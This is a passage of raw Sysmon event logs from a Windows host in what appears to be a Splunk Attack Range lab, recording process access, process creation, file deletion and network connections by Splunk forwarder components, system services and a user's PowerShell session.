Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8FFFEA59FDFBA96B42C65DE5C1B6E94,SHA256=77617EDB1E7F604703D0DF8F9473DF9F909050DC3E4CAC85B20575631DA552FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084919Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.952{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4EC8-613A-4D90-03000000C801}5764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084918Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.952{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084917Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.952{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084916Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.952{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084915Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.952{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084914Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.952{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4EC8-613A-4D90-03000000C801}5764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084913Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.952{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4EC8-613A-4D90-03000000C801}5764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084912Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.939{B81B27B7-4EC8-613A-4D90-03000000C801}5764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035084911Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.253{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4EC8-613A-4C90-03000000C801}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084910Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.253{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084909Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.253{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084908Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.253{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084907Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.253{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084906Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.253{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4EC8-613A-4C90-03000000C801}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084905Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.253{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4EC8-613A-4C90-03000000C801}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084904Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.238{B81B27B7-4EC8-613A-4C90-03000000C801}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035084903Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:52.407{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56670-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035084902Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:52.176{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56669-false10.0.1.12-8000- 23542300x800000000000000035084923Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:29.252{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E95CF0CB5A1DEBFE5687772FBC415104,SHA256=D1F5782D1F9A4C2349B01BA58521847FD9E9443C84546D50DB0312D46A774479,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084922Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:29.252{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CAA73585D093A0AB854CCCE87B7D0296,SHA256=528F00CE51100719CA40460F6616B574098A9CD3F49227C37BB94E2195C3AD5D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084921Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:29.099{B81B27B7-4EC8-613A-4D90-03000000C801}57645280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035084924Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:30.017{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69CA66F4CEB6F24AD9589093B2D0CD9D,SHA256=74AFCDEAEBBDA408884768CD353152D1E04B4BCA8EFE24240CB1392259524825,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084927Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:31.950{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF7181fa87.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084926Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:31.415{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DCA9C41959DACFEE2B007A1FC0D845CC,SHA256=8C9CFB03E9D6FF7555DB9A1CD3C8EA47532C9B8015C28C078D8CCF23B12D59AA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084925Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:31.050{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2C7001E9EFED9E77C3C28DEC4959882,SHA256=CC3144A40089FCD22607DDC148BE80232C8E132BB70C9EB6B1A5F0708F807A14,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084929Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:56.419{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56671-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084928Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:32.081{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED17D758099B5EE251AE02B0DD144854,SHA256=A2E7645D3DD27B369D7E55D3B2BA37D6E9741F665C6DB405F1DC1318D1A73784,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084930Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:33.095{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5E62F8509BCEF8C5A283F86513C480B,SHA256=9D236832055667D6AFA40ED8BF8DA2E163AC1E66DF9142B83E6DBBD2FFE92434,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084932Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:58.117{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56672-false10.0.1.12-8000- 23542300x800000000000000035084931Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:34.112{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37863EFC8088EF678F87BB8C90346F0D,SHA256=BA114BD5732F8FA99B17134825E24D7730A791AA6650C450E6BC55E0296611C7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084933Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:35.131{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C525C372A710B2E788D8C630EF00D7C,SHA256=1F54CD9F25E9A45F578567AB75B9E8BE8A4708942E6DFCB6D8E0FE0EB0049ABC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084936Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:36.630{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CEAF56F09C7BD19EABA3E01B1AE0AE0C,SHA256=2347302D0C0FB9C648679B2B0BDC58064F480947D7DE0AE2E984015AB2FD1014,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084935Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:36.409{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=6DEAA4B39A23E9F17DBFFCB0DE7E315F,SHA256=138FEADE5EE65FE4036DF3E2196C9A44183E9F5C8816E15F4142035AD893F64C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084934Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:36.162{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B904589AC14C686B852A74965D3436EA,SHA256=11A2C72F03FCEC116FD97F44D55B6D51C8345E18CD71B20B5019D81968C37148,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084938Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:01.431{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56673-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084937Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:37.211{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=729FFB3411DF8A84244DCFCD54875F91,SHA256=F5F8A1137CC2D720812AFAAF4086BC440BDC62A65C4B5F1E2CE0FFCFEAE43A59,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084939Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:38.245{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F45B5768908D8E4EFB698CD788B2D5F2,SHA256=A9C46FCF2FF4850D38D2B90B8DBEACDEE0D5A68884FA62C1860D40AD72FDE92D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084941Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:04.128{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56674-false10.0.1.12-8000- 23542300x800000000000000035084940Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:39.265{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 